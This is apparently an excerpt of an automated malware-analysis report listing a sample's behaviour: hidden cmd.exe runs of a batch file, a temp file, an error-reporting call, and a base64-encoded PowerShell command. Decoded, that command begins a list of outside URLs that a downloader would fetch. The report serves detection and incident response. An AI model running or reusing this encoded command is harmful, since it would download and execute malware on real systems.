Technical Information
- '<SYSTEM32>\cmd.exe' /c ""%ALLUSERSPROFILE%\tydkjxjd.bat" "
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc JAByAG8AdwBpAGYAaQB1AGQAPQAiAGgAdAB0AHAAOgAvAC8AcABoAGkAbABpAGEAdABlAGsALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBpADYAeABaADkAUABFAFMAbAA0AFEAQQBXAEwAOQBPAC8ALABoAHQAdABwADoALwAvAGQAaQBh...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1428
- %ALLUSERSPROFILE%\tydkjxjd.bat
- %TEMP%\983009.cvr
- '<SYSTEM32>\cmd.exe' /c ""%ALLUSERSPROFILE%\tydkjxjd.bat" "' (with hidden window)